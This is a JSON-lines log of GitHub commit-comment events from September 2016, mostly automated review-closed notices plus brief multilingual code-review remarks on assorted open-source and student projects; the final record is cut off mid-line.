{"id":"4550581032","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988178,"position":null,"line":null,"path":null,"commit_id":"4cb390a9ad0b77d3abfd6108e8f076df8dbdf252","created_at":"2016-09-12T17:06:57Z","updated_at":"2016-09-12T17:06:57Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=46)"}},"created_at":"2016-09-12T17:06:57Z"}
{"id":"4550581662","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988183,"position":null,"line":null,"path":null,"commit_id":"9b1923634eac7ece282608aa35581293e7fa9736","created_at":"2016-09-12T17:07:04Z","updated_at":"2016-09-12T17:07:04Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=52)"}},"created_at":"2016-09-12T17:07:04Z"}
{"id":"4550581670","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988184,"position":null,"line":null,"path":null,"commit_id":"2551fe2cdd3a65c436de726e59a9ade2c364aa30","created_at":"2016-09-12T17:07:04Z","updated_at":"2016-09-12T17:07:04Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=52)"}},"created_at":"2016-09-12T17:07:04Z"}
{"id":"4550581682","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988185,"position":null,"line":null,"path":null,"commit_id":"9643acf6eafe9b2843c89c0f02ed07e6131cb8c2","created_at":"2016-09-12T17:07:04Z","updated_at":"2016-09-12T17:07:04Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=52)"}},"created_at":"2016-09-12T17:07:04Z"}
{"id":"4550581700","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988186,"position":null,"line":null,"path":null,"commit_id":"3b4a62199575195febbd6601c64a932541e5dc04","created_at":"2016-09-12T17:07:04Z","updated_at":"2016-09-12T17:07:04Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=52)"}},"created_at":"2016-09-12T17:07:04Z"}
{"id":"4550582040","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988188,"position":null,"line":null,"path":null,"commit_id":"402120eb504205b927816a98bd17fab0635cddca","created_at":"2016-09-12T17:07:09Z","updated_at":"2016-09-12T17:07:09Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=53)"}},"created_at":"2016-09-12T17:07:09Z"}
{"id":"4550582501","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988190,"position":null,"line":null,"path":null,"commit_id":"f9f18045de22c9050007d7fed1f8bc2cef588d01","created_at":"2016-09-12T17:07:15Z","updated_at":"2016-09-12T17:07:15Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=55)"}},"created_at":"2016-09-12T17:07:15Z"}
{"id":"4550582523","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988191,"position":null,"line":null,"path":null,"commit_id":"04dc7a7e0d297d784f8e79db40680324b70f53e6","created_at":"2016-09-12T17:07:15Z","updated_at":"2016-09-12T17:07:15Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=55)"}},"created_at":"2016-09-12T17:07:15Z"}
{"id":"4550582586","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988192,"position":null,"line":null,"path":null,"commit_id":"72e080385ac2ecc3c85540465d8c7d51f22a5b25","created_at":"2016-09-12T17:07:15Z","updated_at":"2016-09-12T17:07:15Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=55)"}},"created_at":"2016-09-12T17:07:15Z"}
{"id":"4550583199","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988195,"position":null,"line":null,"path":null,"commit_id":"33f0852a7f3cb13930fd3e5f02e697f10ea6539e","created_at":"2016-09-12T17:07:22Z","updated_at":"2016-09-12T17:07:22Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=56)"}},"created_at":"2016-09-12T17:07:22Z"}
{"id":"4550583224","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988196,"position":null,"line":null,"path":null,"commit_id":"15e36151f8c8bf01b1a0063e10dd54fb3428ca13","created_at":"2016-09-12T17:07:22Z","updated_at":"2016-09-12T17:07:22Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=56)"}},"created_at":"2016-09-12T17:07:22Z"}
{"id":"4550583239","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988197,"position":null,"line":null,"path":null,"commit_id":"2111ae8ec41621da7e2e1348e30a87df50dbe5e7","created_at":"2016-09-12T17:07:22Z","updated_at":"2016-09-12T17:07:22Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=56)"}},"created_at":"2016-09-12T17:07:22Z"}
{"id":"4550584147","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988199,"position":null,"line":null,"path":null,"commit_id":"4e903175b2f8fc3e40f50676397a05700f55407d","created_at":"2016-09-12T17:07:32Z","updated_at":"2016-09-12T17:07:32Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=58)"}},"created_at":"2016-09-12T17:07:32Z"}
{"id":"4550584160","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988200,"position":null,"line":null,"path":null,"commit_id":"9098a7933aea771c2d781d976c4195b90b768882","created_at":"2016-09-12T17:07:32Z","updated_at":"2016-09-12T17:07:32Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=58)"}},"created_at":"2016-09-12T17:07:32Z"}
{"id":"4550584177","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988201,"position":null,"line":null,"path":null,"commit_id":"d9e2a2e2b0d88c1d564a9d6d495efd3ebec4868a","created_at":"2016-09-12T17:07:32Z","updated_at":"2016-09-12T17:07:32Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=58)"}},"created_at":"2016-09-12T17:07:32Z"}
{"id":"4550585246","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988205,"position":null,"line":null,"path":null,"commit_id":"c8339470a7760ec14d5be859fee992df30e23874","created_at":"2016-09-12T17:07:44Z","updated_at":"2016-09-12T17:07:44Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=59)"}},"created_at":"2016-09-12T17:07:44Z"}
{"id":"4550585389","type":"CommitCommentEvent","actor":{"login":"leodemoura"},"repo":{"name":"leanprover/lean"},"payload":{"comment":{"id":18988206,"position":11,"line":11,"path":"tests/lean/run/let3.lean","commit_id":"0b90ace9f8b284b7ef96d826a42842ac58dcadec","created_at":"2016-09-12T17:07:46Z","updated_at":"2016-09-12T17:07:46Z","body":"@Kha check it out :)"}},"created_at":"2016-09-12T17:07:46Z"}
{"id":"4550587565","type":"CommitCommentEvent","actor":{"login":"GrigoriLomonosov"},"repo":{"name":"GrigoriLomonosov/BinaryPuzzleSolver"},"payload":{"comment":{"id":18988212,"position":null,"line":null,"path":null,"commit_id":"03fcdb0e259be1558de868e7f8c473716d5aa199","created_at":"2016-09-12T17:08:11Z","updated_at":"2016-09-12T17:08:11Z","body":"En waarom doe je dat niet met puzzle->squares en puzzle->transponse?"}},"created_at":"2016-09-12T17:08:11Z"}
{"id":"4550587570","type":"CommitCommentEvent","actor":{"login":"nabijaczleweli"},"repo":{"name":"phsym/prettytable-rs"},"payload":{"comment":{"id":18988213,"position":null,"line":null,"path":null,"commit_id":"aefbfdb4152580735be05e832413160be62e297c","created_at":"2016-09-12T17:08:11Z","updated_at":"2016-09-12T17:08:11Z","body":"FYI, you can add \"Closes #number\" to the commit message and GH will autoclose"}},"created_at":"2016-09-12T17:08:11Z"}
{"id":"4550591067","type":"CommitCommentEvent","actor":{"login":"adamschwartz"},"repo":{"name":"EagerIO/stout.is"},"payload":{"comment":{"id":18988219,"position":null,"line":null,"path":null,"commit_id":"452487320fb7ce6682d41066512277666c551fe9","created_at":"2016-09-12T17:08:48Z","updated_at":"2016-09-12T17:08:48Z","body":"thx brother"}},"created_at":"2016-09-12T17:08:48Z"}
{"id":"4550591897","type":"CommitCommentEvent","actor":{"login":"sintsov"},"repo":{"name":"SGolenzovskiy/altrc"},"payload":{"comment":{"id":18988220,"position":null,"line":null,"path":null,"commit_id":"cfc3bb59c231242fb41d30a1c5afb4b31d814a1b","created_at":"2016-09-12T17:08:59Z","updated_at":"2016-09-12T17:08:59Z","body":"код ревью выполнен"}},"created_at":"2016-09-12T17:08:59Z"}
{"id":"4550594138","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18988228,"position":null,"line":null,"path":null,"commit_id":"178cb6f5401c9cdcd82f24a3e95c892a14bfacb3","created_at":"2016-09-12T17:09:25Z","updated_at":"2016-09-12T17:09:25Z","body":"Plugin system today is extremely dirty (Not MVC, not inheriting from any Yii classes, etc). \r\nIf we want to use it for what today are \"core features\", we'd rather rewrite it first.\r\nBut we can debate about it during team meetings, and it's not going to happen soon so...\r\n\r\nFor now: congrat for your great job Denis. I know how hard it can be.... "}},"created_at":"2016-09-12T17:09:25Z"}
{"id":"4550595773","type":"CommitCommentEvent","actor":{"login":"bdpalmeida"},"repo":{"name":"bdpalmeida/Teste-ValeMobi"},"payload":{"comment":{"id":18988236,"position":1,"line":1,"path":"BD.sql","commit_id":"9773065aa8c4261d8310a205bd200374eb481280","created_at":"2016-09-12T17:09:46Z","updated_at":"2016-09-12T17:09:46Z","body":"Cria o banco de dados."}},"created_at":"2016-09-12T17:09:46Z"}
{"id":"4550598342","type":"CommitCommentEvent","actor":{"login":"andronz"},"repo":{"name":"wongatech/HealthMonitoring"},"payload":{"comment":{"id":18988241,"position":7,"line":31,"path":"make/Makefile.ps1","commit_id":"2a1ba0d568097e6dac4a449ce1cb5be77aca4294","created_at":"2016-09-12T17:10:18Z","updated_at":"2016-09-12T17:10:18Z","body":"Im not quite sure what is going on here, is this variable used anywhere?"}},"created_at":"2016-09-12T17:10:18Z"}
{"id":"4550598763","type":"CommitCommentEvent","actor":{"login":"littlesat"},"repo":{"name":"Taapat/enigma2-openpli-vuplus"},"payload":{"comment":{"id":18988244,"position":null,"line":null,"path":null,"commit_id":"a0c5b79f765b9c8314024d55ca9910e3e981959b","created_at":"2016-09-12T17:10:22Z","updated_at":"2016-09-12T17:10:22Z","body":"+\tint fd = openMixer();\r\n +\tif (fd >= 0)\r\n\r\n->\r\n\r\nif (openMixer())"}},"created_at":"2016-09-12T17:10:22Z"}
{"id":"4550599482","type":"CommitCommentEvent","actor":{"login":"mattyx14"},"repo":{"name":"mattyx14/otxserver"},"payload":{"comment":{"id":18988246,"position":null,"line":null,"path":null,"commit_id":"bded0d3158b51dceabeae52bcddec6109798e9f4","created_at":"2016-09-12T17:10:30Z","updated_at":"2016-09-12T17:10:30Z","body":"this no is \"custom\""}},"created_at":"2016-09-12T17:10:30Z"}
{"id":"4550599706","type":"CommitCommentEvent","actor":{"login":"bdpalmeida"},"repo":{"name":"bdpalmeida/Teste-ValeMobi"},"payload":{"comment":{"id":18988247,"position":1,"line":1,"path":"abre.php","commit_id":"9773065aa8c4261d8310a205bd200374eb481280","created_at":"2016-09-12T17:10:32Z","updated_at":"2016-09-12T17:10:32Z","body":"Inicio de todas as páginas."}},"created_at":"2016-09-12T17:10:32Z"}
{"id":"4550601019","type":"CommitCommentEvent","actor":{"login":"Kha"},"repo":{"name":"leanprover/lean"},"payload":{"comment":{"id":18988252,"position":11,"line":11,"path":"tests/lean/run/let3.lean","commit_id":"0b90ace9f8b284b7ef96d826a42842ac58dcadec","created_at":"2016-09-12T17:10:47Z","updated_at":"2016-09-12T17:10:47Z","body":"Yay!"}},"created_at":"2016-09-12T17:10:47Z"}
{"id":"4550602301","type":"CommitCommentEvent","actor":{"login":"bdpalmeida"},"repo":{"name":"bdpalmeida/Teste-ValeMobi"},"payload":{"comment":{"id":18988259,"position":1,"line":1,"path":"cad_mercadoria.php","commit_id":"9773065aa8c4261d8310a205bd200374eb481280","created_at":"2016-09-12T17:11:02Z","updated_at":"2016-09-12T17:11:02Z","body":"Formulário de cadastro de mercadoria."}},"created_at":"2016-09-12T17:11:02Z"}
{"id":"4550602801","type":"CommitCommentEvent","actor":{"login":"macool"},"repo":{"name":"noggalito/porttare-frontend"},"payload":{"comment":{"id":18988260,"position":13,"line":40,"path":"app/scripts/app.js","commit_id":"49ff28009aa6429880a79641b3e64ccd716f201e","created_at":"2016-09-12T17:11:09Z","updated_at":"2016-09-12T17:11:09Z","body":"\"no estás autorizado para hacer esto\"|translate (o podemos coger el mensaje de error del backend, y traducimos sólo allá :allthethings:)"}},"created_at":"2016-09-12T17:11:09Z"}
{"id":"4550603361","type":"CommitCommentEvent","actor":{"login":"moskupols"},"repo":{"name":"privet-team/minijava-compiler"},"payload":{"comment":{"id":18988261,"position":20,"line":18,"path":"pcj/grammar/Statement.h","commit_id":"7a26700064822bc49f3b3b13231ac0d00e5f12b4","created_at":"2016-09-12T17:11:16Z","updated_at":"2016-09-12T17:11:16Z","body":"Меня смущает несимметричность `const VariablesTable*`: по смыслу вернуть тот же указатель обратно совершенно легально, но для этого нам нужен `const_cast`. На самом деле, имхо, слово `const` здесь не нужно: при текущем устройстве `VariablesTable` и так имеет только константные поля.\r\n\r\nЭто, конечно, сигнатура из задания, но тут, мне кажется, они опечатались."}},"created_at":"2016-09-12T17:11:16Z"}
{"id":"4550604187","type":"CommitCommentEvent","actor":{"login":"macool"},"repo":{"name":"noggalito/porttare-frontend"},"payload":{"comment":{"id":18988264,"position":null,"line":null,"path":null,"commit_id":"49ff28009aa6429880a79641b3e64ccd716f201e","created_at":"2016-09-12T17:11:25Z","updated_at":"2016-09-12T17:11:25Z","body":"😍 "}},"created_at":"2016-09-12T17:11:25Z"}
{"id":"4550605716","type":"CommitCommentEvent","actor":{"login":"mikiones"},"repo":{"name":"ScreepsGamers/screeps.behaviour-action-pattern"},"payload":{"comment":{"id":18988268,"position":null,"line":null,"path":null,"commit_id":"e45800f5ab637a1f33bd3f21187e96edf61bd9d9","created_at":"2016-09-12T17:11:43Z","updated_at":"2016-09-12T17:11:43Z","body":"this change make my creeps misbehaving. thy not use shortest path to another room anymore. \r\nand i checked that 25 25 is not problem. some of my rooms have rocks there and never had no path unless thy not have target assigned . \r\n"}},"created_at":"2016-09-12T17:11:43Z"}
{"id":"4550607269","type":"CommitCommentEvent","actor":{"login":"bdpalmeida"},"repo":{"name":"bdpalmeida/Teste-ValeMobi"},"payload":{"comment":{"id":18988272,"position":1,"line":1,"path":"cad_operacao.php","commit_id":"9773065aa8c4261d8310a205bd200374eb481280","created_at":"2016-09-12T17:12:00Z","updated_at":"2016-09-12T17:12:00Z","body":"Formulário de cadastro de operação."}},"created_at":"2016-09-12T17:12:00Z"}
{"id":"4550608740","type":"CommitCommentEvent","actor":{"login":"bdpalmeida"},"repo":{"name":"bdpalmeida/Teste-ValeMobi"},"payload":{"comment":{"id":18988281,"position":1,"line":1,"path":"conexao.php","commit_id":"9773065aa8c4261d8310a205bd200374eb481280","created_at":"2016-09-12T17:12:17Z","updated_at":"2016-09-12T17:12:17Z","body":"Efetua a conexão com o banco de dados."}},"created_at":"2016-09-12T17:12:17Z"}
{"id":"4550610111","type":"CommitCommentEvent","actor":{"login":"bdpalmeida"},"repo":{"name":"bdpalmeida/Teste-ValeMobi"},"payload":{"comment":{"id":18988284,"position":1,"line":1,"path":"estilo.css","commit_id":"9773065aa8c4261d8310a205bd200374eb481280","created_at":"2016-09-12T17:12:31Z","updated_at":"2016-09-12T17:12:31Z","body":"Estilo das páginas."}},"created_at":"2016-09-12T17:12:31Z"}
{"id":"4550610442","type":"CommitCommentEvent","actor":{"login":"domduf"},"repo":{"name":"domduf/projets-Java"},"payload":{"comment":{"id":18988285,"position":null,"line":null,"path":null,"commit_id":"e8764ef25c21b576b93327f59db0984b236ed65c","created_at":"2016-09-12T17:12:35Z","updated_at":"2016-09-12T17:12:35Z","body":"essai de mise dans la Classe Lignebus les methodes de calcul de prix"}},"created_at":"2016-09-12T17:12:35Z"}
{"id":"4550611318","type":"CommitCommentEvent","actor":{"login":"bdpalmeida"},"repo":{"name":"bdpalmeida/Teste-ValeMobi"},"payload":{"comment":{"id":18988287,"position":1,"line":1,"path":"fecha.php","commit_id":"9773065aa8c4261d8310a205bd200374eb481280","created_at":"2016-09-12T17:12:46Z","updated_at":"2016-09-12T17:12:46Z","body":"Fim de todas as páginas."}},"created_at":"2016-09-12T17:12:46Z"}
{"id":"4550612812","type":"CommitCommentEvent","actor":{"login":"macool"},"repo":{"name":"noggalito/porttare-frontend"},"payload":{"comment":{"id":18988295,"position":null,"line":null,"path":null,"commit_id":"49ff28009aa6429880a79641b3e64ccd716f201e","created_at":"2016-09-12T17:13:03Z","updated_at":"2016-09-12T17:13:03Z","body":"> app.js has gotten worse!\r\n\r\nhttps://codeclimate.com/github/noggalito/porttare-frontend/app/scripts/app.js\r\n\r\n:sadpanda:"}},"created_at":"2016-09-12T17:13:03Z"}
{"id":"4550617424","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18988307,"position":null,"line":null,"path":null,"commit_id":"178cb6f5401c9cdcd82f24a3e95c892a14bfacb3","created_at":"2016-09-12T17:13:56Z","updated_at":"2016-09-12T17:13:56Z","body":"Core feature are dirty : https://github.com/LimeSurvey/LimeSurvey/blob/master/application/helpers/SurveyRuntimeHelper.php#L1543 its' one of the example where it can be less dirty in plugin  than in core.\r\n\r\nA plugin using beforeQuestionRender :\r\n\r\n- test some attribute\r\n- according this attribute : call renderScript + renderScriptFile \r\n\r\nSeems better for me than the soup we have actually."}},"created_at":"2016-09-12T17:13:56Z"}
{"id":"4550621797","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988319,"position":null,"line":null,"path":null,"commit_id":"e3493048c2074816763d52d443799cd0f6e40c04","created_at":"2016-09-12T17:14:47Z","updated_at":"2016-09-12T17:14:47Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=64)"}},"created_at":"2016-09-12T17:14:47Z"}
{"id":"4550621811","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988320,"position":null,"line":null,"path":null,"commit_id":"f9a280f36e0e275b24c7868d0b1573c4ceea1433","created_at":"2016-09-12T17:14:47Z","updated_at":"2016-09-12T17:14:47Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=64)"}},"created_at":"2016-09-12T17:14:47Z"}
{"id":"4550621842","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18988321,"position":null,"line":null,"path":null,"commit_id":"ece0a574a00f3193cc4ca76c724901edc6d86590","created_at":"2016-09-12T17:14:48Z","updated_at":"2016-09-12T17:14:48Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=64)"}},"created_at":"2016-09-12T17:14:48Z"}
{"id":"4550622240","type":"CommitCommentEvent","actor":{"login":"bdpalmeida"},"repo":{"name":"bdpalmeida/Teste-ValeMobi"},"payload":{"comment":{"id":18988326,"position":1,"line":1,"path":"menu.php","commit_id":"9773065aa8c4261d8310a205bd200374eb481280","created_at":"2016-09-12T17:14:52Z","updated_at":"2016-09-12T17:14:52Z","body":"Menu das páginas."}},"created_at":"2016-09-12T17:14:52Z"}
{"id":"4550624080","type":"CommitCommentEvent","actor":{"login":"littlesat"},"repo":{"name":"Taapat/enigma2-openpli-vuplus"},"payload":{"comment":{"id":18988332,"position":null,"line":null,"path":null,"commit_id":"a0c5b79f765b9c8314024d55ca9910e3e981959b","created_at":"2016-09-12T17:15:15Z","updated_at":"2016-09-12T17:15:15Z","body":"And why not add all the openMixerOnMute stuff in \r\neDVBVolumecontrol::volumeToggleMute()\r\nthen no function need to be added in python....\r\n(when this is really compatible over different boxes)."}},"created_at":"2016-09-12T17:15:15Z"}
{"id":"4550624402","type":"CommitCommentEvent","actor":{"login":"bdpalmeida"},"repo":{"name":"bdpalmeida/Teste-ValeMobi"},"payload":{"comment":{"id":18988333,"position":1,"line":1,"path":"valida_Campo.js","commit_id":"9773065aa8c4261d8310a205bd200374eb481280","created_at":"2016-09-12T17:15:18Z","updated_at":"2016-09-12T17:15:18Z","body":"Validação dos campos dos formulários."}},"created_at":"2016-09-12T17:15:18Z"}
{"id":"4550626797","type":"CommitCommentEvent","actor":{"login":"sevenEng"},"repo":{"name":"sevenEng/pih-store-instance"},"payload":{"comment":{"id":18988338,"position":null,"line":null,"path":null,"commit_id":"4ed721557a5f89bb5ad40133a0273c88f8dae992","created_at":"2016-09-12T17:15:42Z","updated_at":"2016-09-12T17:15:42Z","body":"*TODO*: parse “endpoint”, publish data  periodically to service enabler"}},"created_at":"2016-09-12T17:15:42Z"}
{"id":"4550629386","type":"CommitCommentEvent","actor":{"login":"racardoso"},"repo":{"name":"PPC64/hhvm"},"payload":{"comment":{"id":18988346,"position":8,"line":147,"path":"hphp/hack/src/heap/hh_shared.c","commit_id":"da73c736615fc493bf89c022e7fa8adb37b95bca","created_at":"2016-09-12T17:16:14Z","updated_at":"2016-09-12T17:16:14Z","body":"Yes. I will send a new PR for this."}},"created_at":"2016-09-12T17:16:14Z"}
{"id":"4550629459","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"andrey-burmistrov/lemon-school"},"payload":{"comment":{"id":18988347,"position":null,"line":null,"path":null,"commit_id":"54f0403b8609166ccfd24bc3df71b98ec4423264","created_at":"2016-09-12T17:16:15Z","updated_at":"2016-09-12T17:16:15Z","body":"фиксированная высота блока about - плохо, нужно было засунуть его в content-1 и задать ему отрицательный margin. Не определился с шириной, сделал на 100%, однако дизайн в 1200px, следовательно все бэкграунды должны были тянуться по всей ширине экрана, а контентная область остаться по середине с фиксированной шириной. Плохо стартанул, поэтому начал костылять. Научишься еще"}},"created_at":"2016-09-12T17:16:15Z"}
{"id":"4550631695","type":"CommitCommentEvent","actor":{"login":"mcifani"},"repo":{"name":"steemit/steemit.com"},"payload":{"comment":{"id":18988352,"position":null,"line":null,"path":null,"commit_id":"f84b8d8d5ad162db73a9f6669183eca2deaea760","created_at":"2016-09-12T17:16:40Z","updated_at":"2016-09-12T17:16:40Z","body":"<img width=\"286\" alt=\"screen shot 2016-09-12 at 10 00 56 am\" src=\"https://cloud.githubusercontent.com/assets/1158463/18445346/fdb361ec-78d1-11e6-9c3d-d83b9557a213.png\">\r\n"}},"created_at":"2016-09-12T17:16:40Z"}
{"id":"4550636067","type":"CommitCommentEvent","actor":{"login":"F03SD"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18988363,"position":null,"line":null,"path":null,"commit_id":"42f2b3525cc2ce810d17b9c258370ec5933838b6","created_at":"2016-09-12T17:17:30Z","updated_at":"2016-09-12T17:17:30Z","body":"@DDuarte snifs (db) topic in forum is actuale r now ?"}},"created_at":"2016-09-12T17:17:30Z"}
{"id":"4550637718","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"andrey-burmistrov/lemon-school"},"payload":{"comment":{"id":18988368,"position":56,"line":124,"path":"6/style.css","commit_id":"54f0403b8609166ccfd24bc3df71b98ec4423264","created_at":"2016-09-12T17:17:48Z","updated_at":"2016-09-12T17:17:48Z","body":"это здесь ни к чему, свойство content нужно только псевдоэлементам `::before` и `::after`"}},"created_at":"2016-09-12T17:17:48Z"}
{"id":"4550639171","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"andrey-burmistrov/lemon-school"},"payload":{"comment":{"id":18988371,"position":33,"line":101,"path":"6/style.css","commit_id":"54f0403b8609166ccfd24bc3df71b98ec4423264","created_at":"2016-09-12T17:18:06Z","updated_at":"2016-09-12T17:18:06Z","body":"фиксированная высота - плохо"}},"created_at":"2016-09-12T17:18:06Z"}
{"id":"4550640573","type":"CommitCommentEvent","actor":{"login":"sglanzer"},"repo":{"name":"ciena-frost/frost-rfcs"},"payload":{"comment":{"id":18988376,"position":2,"line":2,"path":"object-browser-config-example.js","commit_id":"3946f698cddd149714c42154ee255ab178d5dfd3","created_at":"2016-09-12T17:18:22Z","updated_at":"2016-09-12T17:18:22Z","body":"Yeah, that makes more sense - much closer to the intent of the object"}},"created_at":"2016-09-12T17:18:22Z"}
{"id":"4550642014","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"andrey-burmistrov/lemon-school"},"payload":{"comment":{"id":18988379,"position":9,"line":83,"path":"6/style.css","commit_id":"54f0403b8609166ccfd24bc3df71b98ec4423264","created_at":"2016-09-12T17:18:37Z","updated_at":"2016-09-12T17:18:37Z","body":"воу-воу полегче) к чему такие крайности)"}},"created_at":"2016-09-12T17:18:37Z"}
{"id":"4550642189","type":"CommitCommentEvent","actor":{"login":"chriswininger"},"repo":{"name":"chriswininger/Derp-Learning"},"payload":{"comment":{"id":18988381,"position":null,"line":null,"path":null,"commit_id":"7e6d1a5033885491d33de30c496b2e0fc6d4a1d4","created_at":"2016-09-12T17:18:39Z","updated_at":"2016-09-12T17:18:39Z","body":"In the page you are viewing it replaces the text \"deep learning\" with the phrase \"derp learning\". Not sure if I follow? Do you have a suggested description?"}},"created_at":"2016-09-12T17:18:39Z"}
{"id":"4550642192","type":"CommitCommentEvent","actor":{"login":"mcifani"},"repo":{"name":"steemit/steemit.com"},"payload":{"comment":{"id":18988380,"position":null,"line":null,"path":null,"commit_id":"f84b8d8d5ad162db73a9f6669183eca2deaea760","created_at":"2016-09-12T17:18:39Z","updated_at":"2016-09-12T17:18:39Z","body":"<img width=\"153\" alt=\"screen shot 2016-09-12 at 10 18 19 am\" src=\"https://cloud.githubusercontent.com/assets/1158463/18445409/433a8416-78d2-11e6-9608-19efd28ea78a.png\">\r\n"}},"created_at":"2016-09-12T17:18:39Z"}
{"id":"4550643014","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"andrey-burmistrov/lemon-school"},"payload":{"comment":{"id":18988383,"position":50,"line":76,"path":"6/index.html","commit_id":"54f0403b8609166ccfd24bc3df71b98ec4423264","created_at":"2016-09-12T17:18:49Z","updated_at":"2016-09-12T17:18:49Z","body":"предполагалось, что это ссылки"}},"created_at":"2016-09-12T17:18:49Z"}
{"id":"4550643721","type":"CommitCommentEvent","actor":{"login":"cyberblast"},"repo":{"name":"ScreepsGamers/screeps.behaviour-action-pattern"},"payload":{"comment":{"id":18988387,"position":null,"line":null,"path":null,"commit_id":"e45800f5ab637a1f33bd3f21187e96edf61bd9d9","created_at":"2016-09-12T17:18:57Z","updated_at":"2016-09-12T17:18:57Z","body":"hmm then it's something else. mine were bouncing between the rooms with the 25/25 solution... "}},"created_at":"2016-09-12T17:18:57Z"}
{"id":"4550645471","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18988391,"position":null,"line":null,"path":null,"commit_id":"5ec92564b06f1714cc9de355b6c174cc6e1fda54","created_at":"2016-09-12T17:19:17Z","updated_at":"2016-09-12T17:19:17Z","body":"ASIHPValidation (shenb) - x86_64-MacOS-10.9-clang: OK (2318 of 2326 tests passed, 24 test warnings)\n\n * 11 tests had: EIO diffs.\n * 7 tests had: ESO big diffs.\n * 8 tests had: Table big diffs.\n * 3 tests had: MTR big diffs.\n * 16 tests had: ESO small diffs.\n * 25 tests had: AUD diffs.\n * 25 tests had: RDD diffs.\n * 13 tests had: MTR small diffs.\n * 1 test had: Table small diffs.\n * 1 test had: ERR diffs.\n * 1 test had: MTD diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ec92564b06f1714cc9de355b6c174cc6e1fda54-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a 